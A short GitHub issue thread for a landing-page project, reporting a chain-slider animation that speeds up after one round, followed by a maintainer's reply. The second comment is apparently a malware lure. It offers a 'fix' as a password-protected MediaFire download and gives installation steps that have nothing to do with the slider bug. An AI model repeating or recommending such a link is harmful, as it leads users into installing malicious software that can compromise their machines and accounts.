### ISSUE TITLE
A slight error within the chain-slider

### ISSUE THREAD

**Issue by 0xScratch** [AnyFlowLabs/anyflow-landing#22]
Here's how the error looks:

https://github.com/user-attachments/assets/6c16e537-14da-47bb-9396-bba5336cb85d

Notice how the slider escalates its movement after one round.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yudikubota** [comment]
@danilovalerio89 will handle that when he gets back

Thanks for noticing it
